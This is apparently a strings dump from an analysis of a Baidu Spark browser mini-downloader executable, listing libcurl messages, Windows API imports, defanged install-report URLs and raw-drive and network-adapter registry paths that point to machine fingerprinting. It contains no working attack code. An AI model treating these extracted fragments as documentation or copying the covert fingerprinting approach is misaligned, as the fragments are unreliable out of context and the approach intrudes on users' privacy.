Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Refusing to issue an RTSP request [%s] without a session ID.
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport:
Transport: %s
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Refusing to issue an RTSP SETUP without a Transport: header.
Accept-Encoding: %s
Accept-Encoding: %s
Referer: %s
Referer: %s
Range: %s
Range: %s
%s %s RTSP/1.0
%s %s RTSP/1.0
Session: %s
Session: %s
%s%s%s%s%s%s
%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
TFTP
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
got option=(%s) value=(%s)
blksize is larger than max supported
blksize is larger than max supported
%s (%d)
%s (%d)
blksize is smaller than min supported
blksize is smaller than min supported
%s (%ld)
%s (%ld)
%s (%d) %s (%d)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
%s%c%s%c
tftp_send_first: internal error
tftp_send_first: internal error
Received last DATA packet block %d again.
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
tftp_rx: internal error
Received ACK for block %d, expecting %d
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
tftp_tx: internal error, event: %i
TFTP finished
TFTP finished
bind() failed; %s
bind() failed; %s
TFTP response timeout
TFTP response timeout
LOGIN
LOGIN
USER %s
USER %s
APOP %s %s
APOP %s %s
AUTH %s
AUTH %s
No known authentication mechanisms supported!
No known authentication mechanisms supported!
STLS not supported.
STLS not supported.
STARTTLS denied. %c
STARTTLS denied. %c
Access denied. %c
Access denied. %c
Access denied: %d
Access denied: %d
Authentication failed: %d
Authentication failed: %d
PASS %s
PASS %s
%s %s
%s %s
POP3S not supported!
POP3S not supported!
login
login
password
password
%cd
%cd
LOGIN %s %s
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
AUTHENTICATE %s
LIST "%s" *
LIST "%s" *
SELECT %s
SELECT %s
FETCH %s BODY[%s]
FETCH %s BODY[%s]
APPEND %s (\Seen) {%lld}
APPEND %s (\Seen) {%lld}
LOGINDISABLED
LOGINDISABLED
STARTTLS not supported.
STARTTLS not supported.
IMAPS not supported!
IMAPS not supported!
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
Adding handle: send: %d
Adding handle: send: %d
Adding handle: recv: %d
Adding handle: recv: %d
Site %s:%d is pipeline blacklisted
Site %s:%d is pipeline blacklisted
Server %s is blacklisted
Server %s is blacklisted
Server %s is not blacklisted
Server %s is not blacklisted
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Preparing for accepting server on data port
Preparing for accepting server on data port
FTP response timeout
FTP response timeout
FTP response aborted due to select/poll error: %d
FTP response aborted due to select/poll error: %d
CWD %s
CWD %s
getsockname() failed: %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
%s |%d|%s|%hu|
Failure sending EPRT command: %s
Failure sending EPRT command: %s
,%d,%d
,%d,%d
Failure sending PORT command: %s
Failure sending PORT command: %s
Connect data stream passively
Connect data stream passively
PRET %s
PRET %s
PRET STOR %s
PRET STOR %s
PRET RETR %s
PRET RETR %s
REST %d
REST %d
SIZE %s
SIZE %s
MDTM %s
MDTM %s
APPE %s
APPE %s
STOR %s
STOR %s
%c%c%c%u%c
%c%c%c%u%c
Illegal port number in EPSV reply
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
%d,%d,%d,%d,%d,%d
Skips %d.%d.%d.%d for data connection, uses %s instead
Skips %d.%d.%d.%d for data connection, uses %s instead
%d.%d.%d.%d
%d.%d.%d.%d
Bad PASV/EPSV response: d
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
Failed to do PORT
dddddd
dddddd
ddd d:d:d GMT
ddd d:d:d GMT
unsupported MDTM reply format
unsupported MDTM reply format
Got a d response code instead of the assumed 200
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
ftp server doesn't support SIZE
RETR %s
RETR %s
Failed FTP upload:
Failed FTP upload:
RETR response: d
RETR response: d
PBSZ %d
PBSZ %d
ACCT %s
ACCT %s
Access denied: d
Access denied: d
ACCT rejected by server: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
PROT %c
Entry path is '%s'
Entry path is '%s'
QUOT command failed with d
QUOT command failed with d
MKD %s
MKD %s
Failed to MKD dir: d
Failed to MKD dir: d
PRET command not accepted: d
PRET command not accepted: d
Remembering we are in dir "%s"
Remembering we are in dir "%s"
Failure sending ABOR command: %s
Failure sending ABOR command: %s
server did not report OK, got %d
server did not report OK, got %d
QUOT string not accepted: %s
QUOT string not accepted: %s
TYPE %c
TYPE %c
Connecting to %s (%s) port %d
Connecting to %s (%s) port %d
Wildcard - START of "%s"
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Failure sending QUIT command: %s
Uploading to a URL without a file name!
Uploading to a URL without a file name!
FTPS not supported!
FTPS not supported!
operation aborted by callback
operation aborted by callback
seek callback returned error %d
seek callback returned error %d
the ioctl callback returned %d
the ioctl callback returned %d
ioctl callback returned error %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
No URL set!
No URL set!
[^?&/:]://%c
[^?&/:]://%c
Issue another request to this URL: '%s'
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Disables POST, goes with %s
WSAStartup failed (%d)
WSAStartup failed (%d)
insufficient winsock version to support telnet
insufficient winsock version to support telnet
%s IAC %s
%s IAC %s
%s IAC %d
%s IAC %d
%s %s %s
%s %s %s
%s %s %d
%s %s %d
%s %d %d
%s %d %d
Sending data failed (%d)
Sending data failed (%d)
%s IAC SB
%s IAC SB
%s (unsupported)
%s (unsupported)
%d (unknown)
%d (unknown)
USER,%s
USER,%s
7[^= ]%*[ =]%5s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Syntax error in telnet option: %s
Unknown telnet option %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c%s%c%c
%c%c%c%c
%c%c%c%c
7[^,],7s
7[^,],7s
%c%s%c%s
%c%s%c%s
WS2_32.DLL
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
FreeLibrary(wsock2) failed (%d)
SMTP
SMTP
EHLO %s
EHLO %s
HELO %s
HELO %s
AUTH %s %s
AUTH %s %s
Got unexpected smtp-server response: %d
Got unexpected smtp-server response: %d
Remote access denied: %d
Remote access denied: %d
smtp
smtp
MAIL FROM:%s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:%s
RCPT TO:
RCPT TO:
MAIL failed: %d
MAIL failed: %d
RCPT failed: %d
RCPT failed: %d
SMTPS not supported!
SMTPS not supported!
Establish HTTP proxy tunnel to %s:%hu
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s:%hu
%s%s%s:%hu
%s%s%s:%hu
Host: %s
Host: %s
CONNECT %s HTTP/%s
CONNECT %s HTTP/%s
%s%s%s%s
%s%s%s%s
HTTP/1.%d %d
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
Received HTTP code %d from proxy after CONNECT
%sAuthorization: Basic %s
%sAuthorization: Basic %s
The requested URL returned error: %d
The requested URL returned error: %d
%s auth using %s with user '%s'
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Modified-Since: %s
If-Unmodified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Last-Modified: %s
Chunky upload is not supported by HTTP 1.0
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s
Host: %s%s%s:%hu
Host: %s%s%s:%hu
PTF://
PTF://
Range: bytes=%s
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
Content-Range: bytes %s/%lld
PTF://%s:%s@%s
PTF://%s:%s@%s
%s HTTP/%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
%s%s=%s
Internal HTTP POST error!
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP POST request
Failed sending HTTP request
Failed sending HTTP request
HTTP/
HTTP/
Avoided giant realloc for header (max is %d)!
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %s
The requested URL returned error: %s
HTTP error before end of send, stop sending
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP/%d.%d =
HTTP =
HTTP =
RTSP/%d.%d =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
HTTP/1.0 connection set to keep alive!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Unsupported protocol
Unsupported protocol
URL using bad/illegal format or missing URL
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
HTTP response code said error
FTP: command PORT failed
FTP: command PORT failed
FTP: command REST failed
FTP: command REST failed
Operation was aborted by an application callback
Operation was aborted by an application callback
A libcurl function was given a bad argument
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Invalid LDAP URL
Issuer check against peer certificate failed
Issuer check against peer certificate failed
Login denied
Login denied
TFTP: File Not Found
TFTP: File Not Found
TFTP: Access Violation
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: Unknown transfer ID
TFTP: No such user
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Error in the SSH layer
Unable to parse FTP file list
Unable to parse FTP file list
Protocol option is unsupported
Protocol option is unsupported
Protocol is unsupported
Protocol is unsupported
Socket is unsupported
Socket is unsupported
Operation not supported
Operation not supported
Address family not supported
Address family not supported
Protocol family not supported
Protocol family not supported
Winsock version not supported
Winsock version not supported
Unknown error %d (%#x)
Unknown error %d (%#x)
d:d:d
d:d:d
d:d
d:d
%c%c==
%c%c==
%c%c%c=
%c%c%c=
%s xxxxxxxxxxxxxxxx
%s xxxxxxxxxxxxxxxx
00000001
00000001
12345678
12345678
%s/%s
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
0123456789-
0123456789-
; filename="%s"
; filename="%s"
%s; boundary=%s
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
Content-Type: %s
couldn't open file "%s"
couldn't open file "%s"
--%s--
--%s--
SYN.ACK
SYN.ACK
ACK.SYN
ACK.SYN
XXX
XXX
E:\Jenkins\workspace\MiniPackage\build\Release\bdMiniDownloader.pdb
E:\Jenkins\workspace\MiniPackage\build\Release\bdMiniDownloader.pdb
WS2_32.dll
WS2_32.dll
HttpSendRequestW
HttpSendRequestW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
InternetCrackUrlW
InternetCrackUrlW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
PSAPI.DLL
PSAPI.DLL
PeekNamedPipe
PeekNamedPipe
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
ShellExecuteExW
ShellExecuteExW
SHFileOperationW
SHFileOperationW
SHELL32.dll
SHELL32.dll
GDI32.dll
GDI32.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
WSOCK32.dll
WSOCK32.dll
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpOpen
WinHttpOpen
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
WINHTTP.dll
WLDAP32.dll
WLDAP32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
zcÃ
zcÃ
.?AVCMD5Checksum@@
.?AVCMD5Checksum@@
"iTXtXML:com.adobe.xmp
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> S
" id="W5M0MpCehiHzreSzNTczkc9d"?> S
fiTXtXML:com.adobe.xmp
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> )
" id="W5M0MpCehiHzreSzNTczkc9d"?> )
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> r
" id="W5M0MpCehiHzreSzNTczkc9d"?> r
" id="W5M0MpCehiHzreSzNTczkc9d"?> '
" id="W5M0MpCehiHzreSzNTczkc9d"?> '
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> x,
" id="W5M0MpCehiHzreSzNTczkc9d"?> x,
" id="W5M0MpCehiHzreSzNTczkc9d"?> A
" id="W5M0MpCehiHzreSzNTczkc9d"?> A
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
.ve\@
.ve\@
l.upzY
l.upzY
6'7J7Â8`8}8
6'7J7Â8`8}8
7 7$7(7,707
7 7$7(7,707
8$8(8,808^8|8
8$8(8,808^8|8
=$=*=2=@=\=
=$=*=2=@=\=
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
9 9$9(9:9
9 9$9(9:9
3?3`3{3
3?3`3{3
4O4`4{4
4O4`4{4
7’9C9H9M9':G:
7’9C9H9M9':G:
5!5'535@5
5!5'535@5
9Â9p9v9
9Â9p9v9
1 202[2`2
1 202[2`2
=$=(=,=0=4=8=
=$=(=,=0=4=8=
>(>/>4>8>]>
>(>/>4>8>]>
>&?,?0?4?8?
>&?,?0?4?8?
3,52585{5
3,52585{5
0094989
0094989
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
6$6
6$6
Eiexplore.exe
Eiexplore.exe
E-%%
E-%%
1.0.0.0
1.0.0.0
HTTP/1.1
HTTP/1.1
hXXp://en.browser.baidu.com/report/install.cgi?
hXXp://en.browser.baidu.com/report/install.cgi?
SparkMiniInstall.ini
SparkMiniInstall.ini
JhXXp://en.browser.baidu.com/query/package.xml?
JhXXp://en.browser.baidu.com/query/package.xml?
Jspark.exe
Jspark.exe
Software\Microsoft\Windows\CurrentVersion\App Paths\Spark.exe
Software\Microsoft\Windows\CurrentVersion\App Paths\Spark.exe
/ChannelLaunchURL
/ChannelLaunchURL
Advapi32.dll
Advapi32.dll
%s 0%%
%s 0%%
%s -%%
%s -%%
/ChannelLaunchURL=
/ChannelLaunchURL=
..\spark_install.exe
..\spark_install.exe
spark_install.exe
spark_install.exe
en.browser.baidu.com/license.html
en.browser.baidu.com/license.html
en.browser.baidu.com/policy.html
en.browser.baidu.com/policy.html
en.browser.baidu.com
en.browser.baidu.com
id.browser.baidu.com/license.html
id.browser.baidu.com/license.html
id.browser.baidu.com/policy.html
id.browser.baidu.com/policy.html
id.browser.baidu.com
id.browser.baidu.com
Portugu
Portugu
br.browser.baidu.com/license.html
br.browser.baidu.com/license.html
br.browser.baidu.com/policy.html
br.browser.baidu.com/policy.html
br.browser.baidu.com
br.browser.baidu.com
th.browser.baidu.com/license.html
th.browser.baidu.com/license.html
th.browser.baidu.com/policy.html
th.browser.baidu.com/policy.html
th.browser.baidu.com
th.browser.baidu.com
%d.d.d-d:d:d
%d.d.d-d:d:d
%s, Call DownloadOver, percent=%d, RetCode=%d
%s, Call DownloadOver, percent=%d, RetCode=%d
%s, DownloadRet = %d, costtime = f
%s, DownloadRet = %d, costtime = f
%s, costtime = f
%s, costtime = f
%s, Exception
%s, Exception
%s, Start New Channel : %d
%s, Start New Channel : %d
%s, limit download speed
%s, limit download speed
%s, Error : Url or Path NULL
%s, Error : Url or Path NULL
%s, Error : Url or Path empty
%s, Error : Url or Path empty
%s First DestPath = %s
%s First DestPath = %s
%s URL = %s
%s URL = %s
%s, Error : work thread start
%s, Error : work thread start
%s, Error : Path can't write
%s, Error : Path can't write
%s, Error : CreateDirectory fail
%s, Error : CreateDirectory fail
%s, Error : Path no legal
%s, Error : Path no legal
%s, Error : Re In
%s, Error : Re In
F%s, End
F%s, End
%s, Start
%s, Start
X-X-x-XX-XXXXXX
X-X-x-XX-XXXXXX
%s, GetLastError=%d
%s, GetLastError=%d
%s, percent=%d, Speed=%I64d
%s, percent=%d, Speed=%I64d
%s, want to StopThread
%s, want to StopThread
%s, StartNewThread : %d
%s, StartNewThread : %d
%s, cookie = %d
%s, cookie = %d
%s, It should not happen
%s, It should not happen
%s, Stop Thread
%s, Stop Thread
%s, Fail download : retry times = %d
%s, Fail download : retry times = %d
%s, Fail more than max retry time!!!
%s, Fail more than max retry time!!!
%s, Network error
%s, Network error
%s, CTimerStartChannelTask Stop Thread
%s, CTimerStartChannelTask Stop Thread
%s, Stop a Channel : %d
%s, Stop a Channel : %d
%s, CDownloadPartOverTask StopNewThread
%s, CDownloadPartOverTask StopNewThread
%s, Respone = %d
%s, Respone = %d
%s, curl_easy_perform = %d
%s, curl_easy_perform = %d
%s No Valid Dest Path Error
%s No Valid Dest Path Error
%s No ReuseSameFile : RemoteFileSize no same
%s No ReuseSameFile : RemoteFileSize no same
%s No ReuseSameFile : configured size big than remote file
%s No ReuseSameFile : configured size big than remote file
%s No ReuseSameFile : channel num error
%s No ReuseSameFile : channel num error
%s No ReuseSameFile
%s No ReuseSameFile
%s url md5 = %s
%s url md5 = %s
%s, First Start StartNewThread : %d
%s, First Start StartNewThread : %d
%s, Call DownloadStart
%s, Call DownloadStart
%s, MemMap UniqueID:%s
%s, MemMap UniqueID:%s
%s Final DestPath = %s
%s Final DestPath = %s
%s Big File No NTFS disk
%s Big File No NTFS disk
%s, DeleteFile GetLastError=%d
%s, DeleteFile GetLastError=%d
%s No Support Range
%s No Support Range
%s remote size = %I64d
%s remote size = %I64d
%s, GetRemoteFileSize : Retry = %d
%s, GetRemoteFileSize : Retry = %d
%s, GetNetFileSize Respone = %d
%s, GetNetFileSize Respone = %d
%s, GetNetFileSize curl_easy_perform = %d
%s, GetNetFileSize curl_easy_perform = %d
%s Proxy: %s
%s Proxy: %s
%s IE Proxy: %s
%s IE Proxy: %s
%s, Network Error
%s, Network Error
C%s, no gnet file
C%s, no gnet file
%s gnet info: %s
%s gnet info: %s
.gnet
.gnet
%s, cookie:%d, responsecode:%d
%s, cookie:%d, responsecode:%d
%s, mapFile Write Error
%s, mapFile Write Error
%s, cookie:%d, head:%s
%s, cookie:%d, head:%s
127.0.0.1
127.0.0.1
https=
https=
http=
http=
KERNEL32.DLL
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
mscoree.dll
mscoree.dll
WUSER32.DLL
WUSER32.DLL
\Baidu\Common\I18N\conf.db
\Baidu\Common\I18N\conf.db
%s(%d)%s
%s(%d)%s
\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt
\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt
%dddddd
%dddddd
XXxXXXXXXXX
XXxXXXXXXXX
\/:*?"|
\/:*?"|
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe
1.0.0.2
1.0.0.2
bdMiniDownload.exe
bdMiniDownload.exe